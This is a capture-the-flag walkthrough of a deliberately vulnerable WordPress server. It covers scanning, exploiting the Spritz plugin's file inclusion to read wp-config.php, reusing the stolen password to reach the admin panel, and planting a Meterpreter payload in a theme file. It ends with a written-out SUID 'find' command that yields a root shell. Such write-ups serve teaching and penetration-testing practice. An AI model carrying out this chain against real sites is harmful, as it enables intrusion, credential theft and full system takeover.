WordPress CTF walkthrough

A while back I hosted a “hacking and pizza” event at school. There were a large variety of vulnerable hosts. One of the machines I created was a web server with a vulnerable WordPress plugin. In this post, a walkthrough of the solution is provided, as it is common to encounter WordPress installation either during a CTF scenario or a penetration test. Many of the same vulnerabilities are often found in WordPress plugins, such as Local File Inclusion (LFI) and Remote File Inclusion (RFI). Achieving a reverse shell from misusing the admin panel is a common technique as well. Therefore, understanding the necessary tools and tricks used to compromise a WordPress installation is essential.

Nmap reveals that there are numerous services running. SSH has been changed to a different port than default – just for fun. When targeting the web server with nikto, dirbuster, or gobuster – the WordPress installation is revealed at http://192.168.0.73/wordpress/. The next step is to use wpscan, which can enumerate plugins, themes, usernames, passwords, etc.

Wpscan shows a series of vulnerabilities, which are mostly linked to XSS. However, wpscan does not list Spritz version 1.0 as vulnerable. (And yes, I will contact wpscan.org and let them know). However, a quick Google search indicates that the plugin is vulnerable to both LFI and RFI. The necessary information is provided in the Exploit Database. The file wp.spritz.content.filter.php contains vulnerable code.

Exploiting the vulnerability lets the attacker read internal system files. /etc/passwd displays two users: Ajax and Kieren. A common file of interest when attacking any CMS installation is the configuration file. These can often contain usernames and passwords.

Reading the wp-config.php file reveals the database username and password. As users often reuse their credentials – could the password work for either Ajax or Kieren?

Moreover, the vulnerability also confirmed that the plugin was vulnerable to RFI. The image above confirms that it is possible to remotely upload a reverse shell to the targeted system. Achieving a reverse shell using this method is slightly easier than getting a reverse shell with LFI. Read my previous article regarding LFI to Meterpreter for further information. However, the main focus of this article is to exploit the tools embedded in WordPress itself, and not only an RFI vulnerability.

The password retrieved from the wp-config.php file worked for the user “ajax”, and we do now have full access to the administration panel. There are a few ways to achieve a reverse shell. A personal favourite is to enter the Editor section under the Appearance tab and inject the reverse PHP payload. The content of the previously generated meterpreter.php payload is added to the comments.php file. This method can be used on most WordPress installations.

Moreover, Metasploit’s exploit/handler connected to the reverse shell after visiting http://192.168.0.73/wordpress/wp-content/themes/twentysixteen/comments.php. The next step is privilege escalation.

The Linux privilege escalation script LinEnum is uploaded to the targeted system. If the attacker does not have a Meterpreter shell, netcat or wget can be used to transfer the script instead. However, there are many other Linux privilege scalation scripts available if necessary, such as linPEAS.

Moreover, the script reveals that find has been set as a SUID. A SUID allows a regular user to execute the binary as sudo/root; without the necessary permissions. Find is a part of the GTFO bins, which can be used to privilege escalate. The find command has a function called execute, which executes a command when being used. As find runs as root, all executed commands will also be by root.

Executing the command whoami when using find confirms that it runs as root. However, running find . -exec /bin/sh -p \; -quit gives us a fully interactive root shell. Game over!

Conclusion

This is one of many examples of vulnerable WordPress plugins. Even though wpscan did not mark the plugin as vulnerable, a simple Google search confirms the opposite. Not all penetration testing tools are accurate, as a manual lookup has to be conducted once in a while. A simple LFI vulnerability allows an attacker to read the WordPress configuration file. If the user re-uses his/her credentials, an attacker could gain access to the admin panel. From thereon, the Editor allows an attacker to inject malicious PHP code. This will work for most WordPress installations.

Furthermore, there are many different privilege escalation scripts available for an attacker. Most of them identify the SUIDs located on the system. A SUID binary permission can be used to privilege escalate, such as find.